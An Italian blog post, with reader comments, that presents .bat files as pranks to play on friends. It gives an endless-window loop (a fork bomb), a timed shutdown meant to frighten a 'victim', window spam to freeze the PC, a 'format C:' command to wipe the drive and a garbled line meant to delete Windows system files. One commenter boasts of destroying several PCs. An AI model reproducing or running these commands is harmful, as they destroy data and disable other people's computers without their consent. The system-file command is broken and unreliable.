Featured Image

Come creare degli utili comandi in .bat per Windows


Ciao a tutti!!! Oggi vi svelo come creare alcuni simpatici comandi, utili per fare scherzi ai vostri amici.

Eccoveli quindi:

…Infiniti dos…


Questo è uno dei miei preferiti, apre infinite finestre dos ed è quasi impossibile chiuderle tutte XD

1) aprite un blocco note
2) scrivete…
:infinitedos
@start
@echo addio…
@start
@Goto infinitedos

3) salvate il file “nome file”.bat

…Spegnere il pc…

Un’altro divertente e molto utile!!!

1) aprire il blocco note
2) scrivere…

shutdown -s -t (secondi in cui vuoi che si spenga il pc) -c “Commento”

consiglio:
-inserite almeno 45 secondi in modo che la vittima salvi tutto prima che si spenga il pc
-nel commento inserite tantissime parole “terrificanti” in modo che la vittima si prenda di panico XD
3) salvare il file “nome file”.bat
4) se volete risparmiare la vittima andate in fretta su una finestra dos e scrivete…

shutdown -a

Questo comando può essere utile, ad es. io lo uso come scorciatoia per spegnere il computer.

…Impallare il pc...


1) aprire il bloco note
2) scrivere…
start
start
start

(più sono meglio è)

3) salvare il file come .bat, scrivendo “nome file”.bat

I comandi che adesso vi farò scrivere invece, sono, come i precedenti, dei file “.bat”, che però se utilizzati malamente possono fare gravi danni, fino a portare alla reinstallazione del sistema operativo Windows.


***Formattare il pc***



1) prendere il blocco note
2) scrivere…
format C: /autotest /q /u
3) salvare il file “nome file”.bat

Sconsiglio di salvarlo “.bat” in modo di evitare di avviare
la formattazione dell’hard disk.



***Cancellare files di sistema***


1) prendere il blocco note
2) scrivere…


@echo “C:/WINDOWS/SISTEM*.sys


3) salvare il file “nome file”.bat
Sconsiglio di salvare anche questo file in “.bat” per evitare i disastri.

10 pensieri su “Come creare degli utili comandi in .bat per Windows”

  1. @dennis: dipende dal sistema operativo che utizzi. La funzione per la formattazione, è deprecata. Gli altri tips invece funzionano tutti correttamente.

  2. Salve,
    Avrei bisogno di aiuto….
    come posso rendere subito disponibile una variabile settatta tramite un programma eseguito dallo stesso batch senza essere costretto ad uscire per vederla valorizzata nello stesso task di cmd ????
    esempio se eseguo un batch cosi scritto :
    @echo off
    settavar.exe ( e’ il programma che mi setta la
    variabile %dati% )
    echo %dati% ( E’ vuota )
    pause
    per vederne il valore sono costretto a terminare il batch….
    solo allora il suo valore e’ acquisito !!!!
    come posso risolvere questo problema ????
    Vi ringrazio di cuore
    Riccardo

  3. i comandi funzionano tutti e ragazzi non sparate caxxate che in bat ho distrutto un pc con xp e altri due in win 98 S2 e chi ha detto che il bat non e una programazione?il bat e una programazione x cui evitate se non sapete le cose PS:mi scuso per gli errori gramaticali

  4. Lo dico perche’ l’ho provato. Altrimenti le macchine virtuali a cosa servono 🙂

    Per quel che riguarda in effetti IMHO definire i batch un linguaggio di programmazione e’ un po’ azzardato.

    fare un ciclo o un if e’ un’impresa disperata, non ci sono array, liste, cicli while ed altre finezze.

    Diventa usabile se ci metti un po’ di utility aggiunte, ma da solo e’ ben poca cosa…

    vbscript per esempio e’ anni luce avanti.

  5. ciao dark shadow

    per quanto riguarda gli ultimi 2 comandi io non li provo neanche se sono il 100% sicuro che non funzionano, quindi non ero sicuro che funzionassero.

    lospippolo e 1 anonimo hanno detto che non funzionano… meglio così!!!

  6. in xp alcuni comandi giustamente non funzionano in quanto il Dos è solo emulato

    non si può formattare non si possono cancellare file di sistema come in windows 98

  7. Ciao Dark Shadow

    Credo tu debba rileggere l’articolo di djBuby, perché, mio modesto parere, non hai capito il senso dell’articolo. Il post proponeva vari comandi, scritti in bat, per Windows, che possono essere utili per fare dei simpatici scherzi agli amici, o che comunque potevano risultare funzionalmente utili.

    Se secondo te il bat non può essere definito un linguaggio da programmazione questo è un tuo problema.
    Io non utilizzo la censura, in nessuna tipologia di ambiente, e di conseguenza nemmeno in questo. Tu puoi esprimere il tuo parere come io il mio.

    Ciao

  8. mmm, non vorrei ledere le tue convinzioni, ma:

    1) non si formatta la partzione in uso
    2) La programmazione in bat non può nemmeno essere definita tale, sopratutto per scopi distruttivi, questo ne è un esempio. Impara linguaggi costruttivi che è meglio..
    spero che non cancellarai questo commento solo perché va contro all’articolo, ma lo riterrai costruttivo nei tuoi confronti.
    per rispondermi vieni pure a trovarmi sul forum myhack.it

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *